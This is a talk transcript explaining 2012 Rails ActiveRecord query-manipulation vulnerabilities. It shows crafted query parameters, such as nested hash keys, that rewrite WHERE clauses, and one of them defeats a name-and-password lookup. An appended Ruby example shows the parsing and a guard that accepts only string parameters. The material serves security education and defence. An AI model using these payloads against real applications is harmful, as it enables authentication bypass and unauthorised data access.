"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Transcript
Rails Vulnerabilities Last Week: CVE-2012-2660, CVE-2012-2661

CVE-2012-2660
Allows unexpected “IS NULL” in queries. Affects Rails 2.x and 3.x.

ActiveRecord Query:
  unless params[:name].nil?
    @user = User.where(:name => params[:name])
  end

Query Parameters:
  ?name[]                 =>  {"name"=>[nil]}

ActiveRecord Query (with those parameters):
  unless [nil].nil?
    @user = User.where(:name => [nil])
  end

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

CVE-2012-2661
Allows some manipulation of the WHERE clause via “dotted” query keys. Affects Rails 3.x.

ActiveRecord Query:
  User.where(:name => params[:name])
  User.where("users.name" => params[:name])

Query Parameters:
  ?name[users.id]=1       =>  {"name"=>{"users.id"=>"1"}}

ActiveRecord Query (with those parameters):
  User.where(:name => {"users.id" => "1"})

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."id" = 1
Unreleased Vulnerability
Allows some manipulation of the WHERE clause via nested hashes in query values. Affects Rails 2.3.x and 3.x.

ActiveRecord Query:
  User.where(:name => params[:name], :password => params[:password])

Query Parameters:
  ?name[users][id]=1&password[users][id]=1
    =>  {"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}

ActiveRecord Query (with those parameters):
  User.where(:name => {"users"=>{"id"=>"1"}}, :password => {"users"=>{"id"=>"1"}})

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
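All three slides rely on the same mechanism: Rack turns bracketed query keys into arrays and hashes before ActiveRecord ever sees them, and `where` then interprets those structures. The following is an added example, not code from the deck or from Rails: a simplified, constructed re-implementation of that nested-query parsing (no depth limit, no array-of-hash cases) alongside the check a controller can apply so that only plain String values reach `where`. The names `parse_nested_query`, `assign_nested` and `scalar_param` are assumptions.

```ruby
require 'cgi'

# Simplified stand-in for Rack's nested query parsing (constructed for this
# example). Shows how "name[]", "name[users.id]=1" and "name[users][id]=1"
# become an array, a hash with a dotted key, and a nested hash.
def parse_nested_query(query_string)
  params = {}
  query_string.sub(/\A\?/, "").split("&").each do |pair|
    raw_key, raw_val = pair.split("=", 2)
    key = CGI.unescape(raw_key)
    val = raw_val.nil? ? nil : CGI.unescape(raw_val)   # "?name[]" has no value
    m = key.match(/\A([^\[]+)(.*)\z/) or next
    base, brackets = m.captures
    segments = brackets.scan(/\[([^\]]*)\]/).flatten   # "[users][id]" -> ["users", "id"]
    assign_nested(params, [base] + segments, val)
  end
  params
end

# Walks the key path, creating hashes for "[key]" segments and an array for a
# trailing "[]" segment, exactly the shapes seen in the slides above.
def assign_nested(hash, path, val)
  key, *rest = path
  if rest.empty?
    hash[key] = val
  elsif rest == [""]                     # trailing "[]": push onto an array
    (hash[key] ||= []) << val
  else
    assign_nested(hash[key] ||= {}, rest, val)
  end
end

# Defensive check: return the parameter only when it is a plain String, so an
# attacker-supplied array or hash can never be handed to User.where. A missing
# parameter and a non-scalar parameter both come back as nil.
def scalar_param(params, key)
  value = params[key]
  value.is_a?(String) ? value : nil
end

# Example of the guarded lookup. The inspection below uses constructed params.
if __FILE__ == $0
  params = parse_nested_query("?name[]")
  p params                          # {"name"=>[nil]}
  p scalar_param(params, "name")    # nil, so no where(:name => [nil]) is built
end
```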